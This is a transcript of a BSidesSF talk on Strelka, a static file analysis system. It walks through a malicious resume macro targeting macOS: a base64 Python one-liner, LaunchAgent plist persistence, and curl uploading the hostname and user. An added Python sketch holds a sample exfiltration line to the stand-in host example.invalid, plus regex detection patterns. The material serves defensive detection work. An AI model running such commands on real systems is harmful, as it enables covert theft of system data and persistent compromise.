
Beyond AV: Detection-Oriented File Analysis

BSidesSF · 2019 · 28:25 · 622 views · Published 2019-03
Category: Technical
Style: Talk
About this talk
This talk advocates adding detection-oriented file analysis systems to the modern threat detection technology stack by taking an in-depth look at Strelka, Target's recently released static file analysis system. Strelka's project lead will cover an overview of these systems, review Strelka's features and design, and show how data produced by these systems can be used to find malicious files in the enterprise.
Transcript [en]

Josh, please take it away. Thanks, good point: this could potentially replace some products you're going to see at RSA this week. So thanks, everyone, for coming to my talk, and thanks to the organizers for inviting me to speak. This talk is focused on tools and techniques you can use to identify and detect malicious files in your enterprise. The first third of the talk is going to be an overview of detection-oriented file analysis, while the last two thirds will be a bit more technical. We'll end up walking through a real-world example of detecting malicious attributes in a document file. So before I jump into the details, I just wanted to quickly highlight my background. I've been

working in threat detection for six years. I currently work at Target, where I'm a lead engineer in their Cyber Fusion Center, and you can find me all over the various social sites with my handle right there. Also, I work from home, so I wanted to give a shout-out to my perennial co-workers of the year over here on the right. My goal today is really to try to convince you to consider adding detection-oriented file analysis to your threat detection program, because it resolves a data visibility gap that goes unaddressed by tools like antivirus and malware sandboxes, and it's a data visibility gap that you definitely, or probably, have. To start, sometimes it helps a little to

look at a definition. I consider this kind of file analysis to be any that enables real-time threat detection through enrichment, extraction, and metadata collection. The goal of a system that does this kind of analysis is to collect enough data to allow defenders to either automatically or manually identify adversaries in their network. Systems that do this have two defining traits to me: first, they generate a lot of file metadata from which you derive insight, and second, they are, or should be, relatively easy to integrate with the detection systems you currently have while also being customizable to your needs. Definitions are nice, but the real question is what's in it for you if you decide to use a system

like this. The important thing to keep in mind about what I'm going to describe next is that these systems need to do all their tasks quickly and at scale in order to support real-time detection in a large enterprise. First, these kinds of systems provide a pretty comprehensive level of detail across all kinds of files, and that's important so defenders always have a consistent data set to work from. This most commonly includes performing simple tasks like hashing every file with MD5 or SHA-256. Next, these systems commonly perform recursive file analysis; that is, they extract files from within other files and submit them to the analysis engine for processing. You might normally think that

this only applies to something like archive files, but it applies equally to documents and images; even text files can contain other files, and it's important that all those files are supported. Finally, there are just some files that you see in your enterprise that are more interesting than others, and those always tend to get special treatment in these kinds of systems. This would include something like targeting a specific type of metadata that's used to identify adversary activity; for example, doing verbose data collection of an executable's import address table could be important to you. That kind of idea, file-specific metadata inspection, applies to dozens and dozens of kinds of files. What's especially interesting to me

about this kind of analysis is that it's really very underused in the active threat detection space. There aren't a lot of organizations doing this, despite it being highly valuable. This is a release timeline of systems that people commonly reference when they talk about doing this kind of file analysis. The main thing I want to point out about this list is that these systems share common design patterns, but they have different intended purposes. The three I've highlighted here are commonly used as detection and intelligence-gathering systems, while some of the others are more focused on scanning malware or automating mundane analyst tasks. In this presentation I'll be talking about Strelka, which is the

project that I open sourced under Target last year, but if any of what I say today piques your interest, I'd suggest you take this list, review the projects on it, and see which ones may best fit your requirements and use cases. So now we'll talk about Strelka. If you're not familiar with her, she's one of the second-generation Soviet space dogs to achieve orbital flight, and the project is named as such because it borrows its system architecture from Lockheed Martin's Laika project. When it came time to name this project, I wanted to pay homage to their work through the name. The system can be most simply described as a recursive

static file analysis system that's built on Python and ZeroMQ. One of the most significant changes we've made to this project compared to some of the other ones that were shown earlier is that we don't support Python 2. When it came time to start thinking about what the design of a new system like this would be, I knew Python 2 couldn't be supported because its end of life is supposedly coming up very soon, next year. Out of the box, Strelka will produce event data for over 60 unique kinds of files, and we place a pretty significant focus on files that are likely to be used for malicious purposes. Normally you might think of

documents and executables as files that are likely to be used maliciously, but something like HTML could be just as malicious as an executable given the right context. This project has what I think are a number of unique features; many of them are described on its GitHub page. Some of my favorites that are real differentiators are the focus on scanning text-based files (I mentioned HTML; we also support XML, Visual Basic code, JavaScript, batch scripts, and many more) and the heavy focus on language-neutral components: we use ZeroMQ for networking, protobuf for the messaging format, and YAML for the configuration files. The project core is written in Python, but, you know,

technically you could write portions of it in nearly any language you want that is supported by those components. Here we have a system architecture diagram of Strelka. There are two important things to immediately call out here. The first is the dotted lines running north to south: those are network hops, so this is a distributed system. The second is the components in the center: those two components constitute a cluster. From a deployment point of view, Strelka's primary goal is to integrate with whatever existing systems you have for detection as seamlessly as possible. On the front end, that means that clients tend to be things like network security monitoring sensors, and they just continuously push files to the cluster.

On the back end, the event data is written in JSON, and you really can do whatever you want with it. Most users end up sending it to a centralized log aggregation system like Splunk or Elastic; you could also just stick it in an on-prem or cloud database. We don't limit what you can do with the data, we just make it available to you. What's cool about that system architecture is that it makes it really easy to scale a cluster. The cluster I manage regularly scans up to 150 million files a day, which is also approximately three terabytes of file content a day, and the system will keep track of how long it

takes to scan each file. For the cluster I manage, at the 95th percentile it takes 13 to 14 seconds to scan a file; as soon as you go to the 85th percentile and lower, you hit sub-second scan times. So the speed of an individual scan plus the distributed design really means you can scale to whatever volume of files you need to handle. When I introduce this project to people for the first time, there are always some questions that pop up right away, and these are those questions. I don't consider this to be an intrusion detection system; I say that it enables intrusion detection. You still need a human to decide what to do with

the data that gets produced. That could be writing automated alerts from the data or manually crawling through the data, something like threat hunting. It's written in Python because Python has good third-party package support for the kinds of files we care to scan, and it really is just good enough; the system architecture lets us bypass any inefficiencies it has through brute-force scaling. When it comes to scalability, we don't use microservices because they're way too difficult to manage and really are overkill for the vast majority of users. We use cookie-cutter scaling, which means you build a cluster, and if it hasn't met the scale you need, you just keep adding carbon copies of the same server to the cluster until

you either hit the scale you need or you run out of hardware. Those are really the introductory details. This is where we get to the interesting part of this talk, which is what you could actually find with this data. To do that, I'm going to call on someone I follow on Twitter. This is John Lambert; he works over at Microsoft, and he shares a lot of interesting malware samples online, many of which unsurprisingly include Office documents. What we're going to do here is take one of the samples he shared late last summer, walk through the Strelka data for that file, and try to determine if we think it's malicious or not. So what we'll be

looking at is three files in total. The first file is an Office document, a resume from Amanda, and the other two files are nested inside of that document. While we do this, I'd just like you to remember this stat that's over here on the left: only 6 out of 59 AV engines flagged this document as suspicious, which is a pretty low percentage, approximately 10%. This is the literal JSON output of the Strelka system. This is file one of three that we'll be looking at; this is the document itself. Before we really dig in here, I think it's important to call out some of the

structure of the data. The first is that at the root of the JSON event there's a variety of metadata dictionaries, and they're all very literally named for the data that is encapsulated within them. So hash metadata is the result of hashing functions, zip metadata is artifacts related to zip extraction, ExifTool metadata is related to the output of the ExifTool utility, things like that. These are very literally named so it's easy for an analyst to understand what the data represents. The thing that is a little weirder and not literally named is this thing called flavors at the top. In Strelka, we don't identify files by type, we identify them by flavor, and that's because sometimes it's useful to

identify a file by more than its type. An example of that would be, say, an XML file that is simultaneously a malware configuration file; those are both valid ways to identify that file. We use these flavors to assign the scanners that produce the metadata you see here, so it's important that we're flexible in how we name these things. The two primary methods of tasting flavors in the system are libmagic and YARA, represented by the mime and yara fields in the flavors dictionary. What we're actually going to do here is walk through this almost line by line and talk through the interesting points. First, if we didn't already know that this was an

Office document, the flavors are the thing that tells us that it is. This happens to be a docx file; that's what it would normally appear to be on an endpoint if you were looking at the file. That's an Office Open XML file. The other interesting thing about the system is that we hash every file no matter what, so it always gets MD5, SHA-1, SHA-256, etc. We also assign a unique ID to the file, because you need to be able to keep track of files that are directly related to one another, so we tag it with this unique ID. If you keep an eye on the value of that UID,

you'll see it pop up here again momentarily. Now this is where we actually get into the interesting bits of detecting adversaries. If you're not familiar with ExifTool, it's a fairly popular utility for parsing generic metadata out of hundreds of kinds of files: documents, image files, archive files, and many more. What is interesting about the ExifTool metadata for this document is that there's nothing interesting about it. You can see from the word count that the document appears to have a reasonable amount of words in it; it's got basically a reasonable amount of content for a

resume. The creator value contains Amanda's name, which matches the resume content; you could actually go back and look at John's tweet to confirm that. What's interesting about this being uninteresting is that it isn't uncommon for adversaries to flub the values of this metadata. For example, they might send you a resume that has five words in it, which is weird, or send you a resume that has a creator value that is just a random string and not someone's name. Those are interesting things that you could use as detection breadcrumbs to figure out if you're dealing with something that might be malicious. That's really all there is to that. This is going to kind of come

into play later. What's interesting is that the adversary in this case did a pretty good job of trying to obfuscate their delivery of malware, but it ends up being pretty futile in the end. The last point here is that these files have the structure of a zip, so when they are introduced to the system, they get extracted as if they were a zip file. We just take all eighteen parts out of the file and parse those out, and what we're going to be looking at next is one of those eighteen files; I believe this document has eighteen parts in all. So this is the

second file, two of three, and the thing to call out here is the existence of this dictionary called VBA metadata. That's Visual Basic for Applications metadata, and its presence tells you this document might have macros in it, macros being the thing that is intended to help end users by automating document-related tasks but is typically used by adversaries to automate the installation of malware. If you look at the flavors, there's really nothing too interesting here. This is identified as an OLE compound file, which you actually don't need to know too much about; it's just a kind of file that stores other files, and in documents it commonly stores macros.
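
The extraction step described above (treat the document as a zip, pull out every part, hash it, and notice which part is an OLE compound file) can be sketched in a few lines of standard-library Python. This is only an illustration of the idea, not Strelka's scanner code: the function names, the event field names, and the three-part stand-in document are assumptions made for the example. The one fixed fact it relies on is the eight-byte signature that opens every OLE compound file.

```python
import hashlib
import io
import zipfile

# Signature bytes that open every OLE compound file (the container
# that typically holds macros, e.g. word/vbaProject.bin).
OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")


def extract_parts(container: bytes) -> list:
    """Unzip an OOXML-style container and describe each part it holds.

    The dictionary keys are hypothetical and chosen for this sketch.
    """
    events = []
    with zipfile.ZipFile(io.BytesIO(container)) as archive:
        for info in archive.infolist():
            data = archive.read(info)
            events.append({
                "name": info.filename,
                "size": len(data),
                "sha256": hashlib.sha256(data).hexdigest(),
                "is_ole": data.startswith(OLE_MAGIC),
            })
    return events


def build_sample_document() -> bytes:
    """Build a tiny stand-in for a macro-bearing document (not a valid Word file)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("word/document.xml", "<document/>")
        archive.writestr("word/vbaProject.bin", OLE_MAGIC + b"\x00" * 16)
    return buffer.getvalue()


parts = extract_parts(build_sample_document())
ole_parts = [part["name"] for part in parts if part["is_ole"]]
print(ole_parts)
```

A real system would feed each extracted part back into the same pipeline, which is what makes the analysis recursive; the sketch stops after one level to stay short.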

Once again, we hash all the files and we assign a unique ID to all the files. In this case there's a new field called parent UID, which holds the value of the UID from the previous file. This is how we very explicitly relate files together; it's important, if you're looking at this kind of data, to be able to pivot between files that are related. Finally, the VBA metadata actually doesn't say too much that's interesting, except it confirms any suspicions we had that yes, there was macro code inside the document, and we're going to be looking at the actual code of one of the macros on the next slide. The VBA scanner also tries to be

helpful and tell you about suspicious things in the VBA code, like base64-encoded content; we're going to look at that in more depth in the next file. So this is the third file, three of three. This is the Visual Basic code from one of the macros; it's nested pretty deep within the document. What's interesting is that nearly everything that's detection-worthy about this entire document, all 30-plus parts, can be found in one field here, which is the VB metadata strings. These are literally strings defined in the VB code as variable definitions, like a equals blah; that's the kind of string we're talking about here. We're

going to spend pretty much the rest of the presentation on that in particular, because there's just so much to unpack there. If you look at the flavors, YARA successfully identifies this as VB code; libmagic has no idea what VB code is, so it just says it's plain text, which is correct though a little imprecise. I'll skip the hash metadata and UID; once again, we hash everything all the time, and this is how you relate files together. But the VB strings are really where things pop off in this document. The first thing that's interesting is this Python one-liner, and as I'm going through this, I want you to just recall: this is a resume from

Amanda. Why does it have a macro that contains a Python one-liner that is base64-decoding a very long string? In this case the string was so long I had to truncate it for space; otherwise all of this would have been illegible. There's also something else that's interesting here, which is that they explicitly call a function to filter out and ignore any warnings thrown by the Python interpreter. I'll leave you to think about that for a minute; we'll come back at the end to why they may want to do that. So it's weird that that exists at all in someone's resume, but then it gets even weirder when you see this reference at

the end of the first highlighted line here to a LaunchAgents directory and a Spotify browser API property list file. This is really your first indicator that you're looking at something that's targeting a Mac user and not a Windows user. If you're not familiar with launch agents or property lists, they're used to control system-level processes on a Mac. What's even more interesting is that not only do they reference the file, they actually have the structure of a property list file following it. You can see on the second line here there's the header of a plist file, and at the end of the third line there is a label that gets set that says Spotify

browser API, which is clever. From what I can tell (I'm not doing forensics here, I'm just looking at metadata, so we're making some guesses), what's probably happening is that they are inserting the content into that file location, so they're either creating or overwriting that Spotify browser API plist. But it goes even further. This is all non-encoded data, just plain text in the VB code, and they go on to define what program is executed by the plist. What they have here is an array that says python -c

and then a blank string. We can't prove what Python is actually executing here, but a pretty good theory is that it's the one-liner we saw earlier; they could insert that into the plist via a variable definition, which is very likely what's happening here. If we're right, that means that when the plist initializes and runs on the system, it's actually executing whatever that Python blob is. We can go even further, and it really gets crazier: there are plist attributes that really clue you in to adversarial intent and how they're

attempting to maintain control over the system. The RunAtLoad key means run the program as soon as the job is loaded, effectively at boot or login; the StartInterval and KeepAlive keys are methods of ensuring that the program is always running. These are methods of persistence for processes that are controlled by a property list file, and they guarantee that the Python one-liner is always running. The last thing here is this curl command, and there's a lot to unpack even in this one bit of the VB code. In this curl command they do some interesting things. The first thing they do is override curl's default user agent string and set it to mimic a Mac,

which is pretty clever. So that's the first indicator: if you don't know anything about launch agents or plists or how macOS works, that's the thing that tells you this is certainly targeting a Mac user. But they go further and actually suppress the output of curl, which is a fun callback to the technique they used in the Python one-liner to suppress warnings. Python and curl have these utility-like options built in to suppress output, essentially, and that's an advantage for the adversary, because it means that when they execute their code in your environment, you're less likely to see them. The

other two things that are interesting about this are the domain and the direction of the transfer. On the domain: a very attentive analyst, or say a domain reputation service that is keyed into that domain, would eventually be able to tell you that it is not a legitimate Spotify domain. And then finally, they're not downloading data from this domain, they're uploading data to it; the -d flag says that. Once again, we're not doing forensics, we're just looking at metadata, so I can't authoritatively tell you what they're uploading. But what's suspicious is that immediately after that there's a variable assignment for a shell command substitution which contains the system's hostname and current user, which, if you think about it, makes a lot of

sense, because when an adversary gains access to your network, what kinds of things do they need to know? They need to know where they landed in the network, which you could glean from a hostname, and they need to know what level of access they have to the network, which you could glean from the current user on the system they've just popped. Now, if you're not familiar with MITRE's ATT&CK matrix, which has actually been mentioned a lot during this conference, so maybe you are now, what I've done is map the techniques I just walked through to the ATT&CK matrix: the tactics on the right, the techniques I just walked

through on the left. One thing I want to stress about all these techniques (I'm not going to read them, because we just literally went through them) is that individually they may not be detection-worthy on their own, but in aggregate they create what I think is a pretty compelling argument for a file analysis system like Strelka and its use in detecting adversaries. So remember: this document had a low antivirus detection rate, malware sandboxes are not designed to collect this kind of data and make it easily available at large scale, and in addition to all of that, adversaries don't really expect you to have this level of insight into the files that are

moving in, out, and around your network, because if they did, this adversary probably wouldn't have left all that data unencoded. So that's where I'll wrap it up. Once again, if any of this piques your interest, I'd be happy to chat with you about this project or point you in the direction of project owners for any of the other projects that were shared earlier. If you're interested in maturing your threat detection program, I'd recommend you take a look at this kind of file analysis, because it opens up levels of insight that adversaries really don't expect you to have, and that gives you a pretty big advantage when

they try to jump into your network. I consider this kind of data to be a fifth tentpole alongside the commonly thought-of tentpoles of threat detection: network data, endpoint data, cloud data, and authentication data. I think file data like this could easily become a significant part of a threat detection program. That's really where I'll leave it. Any questions that came in online or in the room? We have a question from Ron: you stated six out of fifty-nine AV engines marked the files as malicious; which AV engines were those? Yeah, that's an interesting question. I actually happened to look that up right before this talk, and it wasn't any engine you're probably running.

It's stuff like SentinelOne. Not to call out vendors or anything like that, I'm not recommending vendors here, but it was vendors that are more geared toward behavioral analysis and not signature analysis. None of your top five AV vendors detected this. Great work. As someone who does file detection, I had a couple of follow-up questions. Does Strelka handle extraction of features from packed files or obfuscated file samples? Well, what's interesting about it: I don't know that it does out of the box. So we have support for (let me jump back here) these five main categories, but it's all

just Python code, so you could very easily write your own scanning code to handle whatever kind of file you like, and then the way it works is you write a complementary YARA signature to identify the file generically. Okay, so this is plug-in friendly and you could add your own [unclear]? Absolutely, yeah. It's designed to be very easy to add your own code to it. And in the sample you scanned, there were 18 levels of associated files; what's the limit? Have you had a zip bomb or anything like that? Yeah, so there's a lot of nuance built into this that I really

don't have time to go through, but yes, zip bombs are a threat to systems like this. All of the scanners that extract files do have file limits; the default limit is very high, like a thousand files, things like that. In the case of a zip bomb, you're more likely to run out of memory before you actually hit that file limit. So yeah, you do need to do system hygiene and system hardening to protect yourself against files that might be actively trying to mess with systems like this. Yeah, thanks. First, thanks for the presentation, awesome stuff. A couple of questions about what the project supports, if that's okay?

Yep. So when you're doing VBA extraction, are you relying on external libraries like oletools, or something custom? oletools. One thing I didn't really talk about is that this project is pretty much all my work; we don't have a team supporting this, it's just what I do in my equivalent of 10% time, so it's heavily reliant on third-party packages. Cool. And this kind of bleeds into the previous question: how difficult would it be to expand the analysis pipeline? So if I wanted to treat the OOXML file as a straight zip and look at timestamps within the file, is that something... Yeah, it's very easy. I

mean, as long as you have written code in Python before, it's all very easy to do. The README is absurdly long and very detailed to help you with that. Cool. And have you looked at RSIDs in RTF or OOXML files? Not specifically. Cool, thank you. Yep. One last question, do we have anyone? Yes, we do, in the far back, way up near the top of Mount Everest.

So I kind of tricked you: it's actually a statement, not a question. First of all, thanks for your talk and thanks for your contribution. And this is being recorded, right? Your boss should totally give you a raise. Well then, thank you. Thank you, Josh, it's been a pleasure. Thanks, thanks everyone.
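
As a closing illustration of the walkthrough's main argument, that each string-level clue is weak on its own but compelling in aggregate, here is a minimal sketch of how extracted macro strings might be checked against a handful of indicators. Everything in it is an assumption made for the example: the indicator names, the regular expressions, the sample strings (written for this sketch, not taken from the real sample), and the use of curl's `-s` flag to stand in for "suppressed output", which the talk does not name explicitly. It is not Strelka code and not a recommended rule set.

```python
import re

# Hypothetical indicator patterns loosely modelled on the clues from the talk.
INDICATORS = {
    "python_inline_exec": re.compile(r"\bpython\s+-c\b"),
    "base64_decode": re.compile(r"b64decode|base64"),
    "launch_agent_path": re.compile(r"Library/LaunchAgents/"),
    "plist_persistence": re.compile(r"<key>(RunAtLoad|KeepAlive|StartInterval)</key>"),
    "curl_silent": re.compile(r"\bcurl\b.*\s(-s|--silent)\b"),
    "curl_upload": re.compile(r"\bcurl\b.*\s(-d|--data)\b"),
    "command_substitution": re.compile(r"\$\([^)]*\)"),
}


def score_strings(strings):
    """Return {indicator name: number of strings that matched it}."""
    hits = {}
    for name, pattern in INDICATORS.items():
        matched = [text for text in strings if pattern.search(text)]
        if matched:
            hits[name] = len(matched)
    return hits


# Made-up strings standing in for the "VB metadata strings" field.
sample_strings = [
    'python -c "import base64; exec(base64.b64decode(PAYLOAD))"',
    "~/Library/LaunchAgents/com.example.agent.plist",
    "<key>RunAtLoad</key><true/>",
    'curl -s -A "Mozilla/5.0 (Macintosh)" -d "$(hostname):$(whoami)" https://example.invalid/upload',
    "Work experience and education",
]

hits = score_strings(sample_strings)
print(sorted(hits))
print(f"{len(hits)} of {len(INDICATORS)} indicators present")
```

Counting distinct indicators rather than alerting on any single one mirrors the point made in the talk: a resume that mentions base64 is unremarkable, while a resume that also writes a launch agent and uploads the hostname is not.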